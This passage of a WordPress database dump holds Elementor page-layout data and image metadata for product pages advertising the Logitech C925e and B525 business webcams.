instead.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"85aaabb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"52be741\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT PRIVACY SHADE<\\/h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"12cd6b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"7fd417d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1bafb2c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b324521\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"94bc207\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5945,3016,'_wp_page_template','template-fullwidth.php'),(5946,3016,'_elementor_edit_mode','builder'),(5947,3016,'_elementor_template_type','post'),(5948,3016,'_elementor_data','[{\"id\":\"7eb1b46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"90b3559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26a8ab0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p><ul><li>Designed for desktop video conferencing<\\/li><li>RightLight\\u2122 2 ensures clear video with typical office lighting<\\/li><li>Sliding internal shade assures privacy<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcb930b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a67935f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.png\",\"id\":3013}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"33836ab\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d297e1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1bb040\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62807a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c9280e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"dce298e\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b80aec0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd91481\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8c829dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.806},\"elements\":[{\"id\":\"a18b328\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam.jpg\",\"id\":3014}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5a5a9cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.194},\"elements\":[{\"id\":\"3a9a2d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>MORE PRODUCTIVE CALLS<\\/h3><p>When you can\\u2019t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"54450f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"36b6683\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.645},\"elements\":[{\"id\":\"234303b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLight\\u2122 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aebe58b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.355},\"elements\":[{\"id\":\"ff49651\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.jpg\",\"id\":3015}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f9af5e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ee152d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ff07ea9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fbdfcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60c93c1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"32c6b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b70be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE MOUNTING OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C925e on your own tripod instead.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"85aaabb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"52be741\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT PRIVACY SHADE<\\/h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"12cd6b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"7fd417d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5958,3018,'_wp_attached_file','2019/03/b525-pdp-2017-refresh-1.png'),(5959,3018,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:35:\"2019/03/b525-pdp-2017-refresh-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5950,3007,'_elementor_version','0.4'),(5952,3017,'_wp_page_template','template-fullwidth.php'),(5953,3017,'_elementor_edit_mode','builder'),(5954,3017,'_elementor_template_type','post'),(5955,3017,'_elementor_data','[{\"id\":\"7eb1b46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"90b3559\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26a8ab0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p><ul><li>Designed for desktop video conferencing<\\/li><li>RightLight\\u2122 2 ensures clear video with typical office lighting<\\/li><li>Sliding internal shade assures privacy<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcb930b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a67935f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.png\",\"id\":3013},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"33836ab\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d297e1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1bb040\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH C925E<\\/h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62807a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c9280e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"dce298e\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b80aec0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd91481\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8c829dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":65.806},\"elements\":[{\"id\":\"a18b328\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam.jpg\",\"id\":3014}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5a5a9cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":34.194},\"elements\":[{\"id\":\"3a9a2d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>MORE PRODUCTIVE CALLS<\\/h3><p>When you can\\u2019t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"54450f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"36b6683\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":40.645},\"elements\":[{\"id\":\"234303b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VIDEO IN ANY ENVIRONMENT<\\/h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLight\\u2122 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aebe58b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":59.355},\"elements\":[{\"id\":\"ff49651\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/c925e-webcam-1.jpg\",\"id\":3015}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f9af5e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ee152d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ff07ea9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fbdfcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60c93c1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"32c6b14\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3b70be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE MOUNTING OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount C925e on your own tripod instead.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"85aaabb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"52be741\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT PRIVACY SHADE<\\/h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"12cd6b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"7fd417d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5956,3017,'_elementor_version','0.4'),(8688,3669,'_edit_last','1'),(8689,3669,'_thumbnail_id','3665'),(5960,3018,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.74450092348215246573772674310021102428436279296875;s:5:\"bytes\";i:38306;s:11:\"size_before\";i:567959;s:10:\"size_after\";i:529653;s:4:\"time\";d:0.899999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1624;s:11:\"size_before\";i:22475;s:10:\"size_after\";i:20851;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:5818;s:11:\"size_before\";i:68538;s:10:\"size_after\";i:62720;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4747;s:11:\"size_before\";i:54389;s:10:\"size_after\";i:49642;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:12558;s:11:\"size_before\";i:157506;s:10:\"size_after\";i:144948;s:4:\"time\";d:0.25;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:13559;s:11:\"size_before\";i:265051;s:10:\"size_after\";i:251492;s:4:\"time\";d:0.4699999999999999733546474089962430298328399658203125;}}}'),(5961,3019,'_wp_attached_file','2019/03/b525-pdp-2017-refresh.jpg'),(5962,3019,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:33:\"2019/03/b525-pdp-2017-refresh.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"b525-pdp-2017-refresh-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5963,3019,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.96873232608871351345669609145261347293853759765625;s:5:\"bytes\";i:8865;s:11:\"size_before\";i:148524;s:10:\"size_after\";i:139659;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.62000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:503;s:11:\"size_before\";i:6605;s:10:\"size_after\";i:6102;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:631;s:11:\"size_before\";i:10579;s:10:\"size_after\";i:9948;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:2816;s:11:\"size_before\";i:52486;s:10:\"size_after\";i:49670;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:690;s:11:\"size_before\";i:10113;s:10:\"size_after\";i:9423;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:1804;s:11:\"size_before\";i:26503;s:10:\"size_after\";i:24699;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:2421;s:11:\"size_before\";i:42238;s:10:\"size_after\";i:39817;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(5974,3022,'_elementor_edit_mode','builder'),(5973,3022,'_wp_page_template','template-fullwidth.php'),(5972,3008,'_elementor_data','[{\"id\":\"1bd07bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"15ffe3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7e392b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH B525<\\/h2><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p><ul><li>1080p HD quality in a compact form factor<\\/li><li>Folds for grab-and-go convenience<\\/li><li>360\\u00b0 swivel so you can point in any direction<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e958b43\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac0fc79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/b525-pdp-2017-refresh-1.png\",\"id\":3018}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"63d7c6e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0b8649a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b26633b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PORTABLE HD VIDEO CAMERA<\\/h2><p>For on-the-go professionals, Logitech B525 HD Webcam makes it easy to bring a webcam to every meeting. The compact, folding design simplifies travel, and features a universal mounting clip for your laptop or other device. High-definition video presents clear images for every participant to see.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"212d5f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5daecb1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"5192f45\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"51cca04\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9607670\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca77659\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":53.871},\"elements\":[{\"id\":\"e24f4d5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/b525-pdp-2017-refresh.jpg\",\"id\":3019}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"df06a88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":46.129,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6e67ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HIGH-QUALITY IMAGE AND SOUND<\\/h3><p>Image quality is important for your business meetings. The affordable B525 HD Webcam, capturing 1080p Full HD video at 30 frames per second, delivers clear images even in low-light conditions. Built-in autofocus maintains sharpness as close as 10 cm.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ae1149\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fd54ece\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6e59f08\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>Plug and play to start every meeting on time. The B525 HD Webcam works with all leading video conferencing software for PC and Mac. The convenient fold-and-go design lets you pack the camera and take it with you. Just attach it to your laptop and begin your meeting.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fa57b59\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04307b6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/b525-pdp-2017-refresh-1.jpg\",\"id\":3021}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc32e90\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"38b106e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ba995e9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"224e754\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c6210b3\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"77b161d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"16bd9e4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PERSONAL FIELD OF VIEW<\\/h4><p>With a 69-degree field of view, B525 captures an ideal head-and-shoulders frame for distraction-free video conferencing.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cb49e73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c56a3a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FOLD AND GO<\\/h4><p>Perfect for road warriors, B525 folds to a compact, bag-friendly size, which also protects the lens from scuffs and scrapes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa56502\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"95c4de8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>AIM AT THE ACTION<\\/h4><p>B525 swivels a full 360 degree on its mount so you can aim the camera at yourself, your customer, or anywhere in the 